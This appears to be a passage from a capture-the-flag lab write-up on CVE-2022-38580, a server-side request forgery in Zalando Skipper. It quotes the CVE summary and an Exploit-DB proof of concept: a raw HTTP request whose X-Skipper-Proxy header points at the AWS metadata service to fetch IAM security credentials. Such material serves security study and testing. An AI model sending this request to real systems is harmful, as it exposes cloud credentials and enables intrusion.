CVE-2022-38580
vulnerability was found in Zalando Skipper 0.13.236. It has been rated as critical. Affected by this issue is an unknown function. The manipulation with an unknown input leads to a server-side request forgery vulnerability. Using CWE to declare the problem leads to CWE-918. The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Impacted is confidentiality, integrity, and availability.
Exploit
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ searchsploit -x multiple/remote/51111.txt
Exploit: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
URL: https://www.exploit-db.com/exploits/51111
Path: /usr/share/exploitdb/exploits/multiple/remote/51111.txt
Codes: CVE-2022-38580
Verified: False
File Type: ASCII text
#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
#Date: 24/10/2022
#Exploit Author: Hosein Vita & Milad Fadavvi
#Vendor Homepage: https://github.com/zalando/skipper
#Software Link: https://github.com/zalando/skipper
#Version: < v0.13.237
#Tested on: Linux
#CVE: CVE-2022-38580
Summary:
Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.
Proof Of Concept:
1- Add header "X-Skipper-Proxy" to your request
2- Add the aws metadata to the path
GET /latest/meta-data/iam/security-credentials HTTP/1.1
Host: yourskipperdomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Skipper-Proxy: http://169.254.169.254
Connection: close
Reference:
https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2It would appear that the SSRF vulnerability works by appending the X-Skipper-Proxy header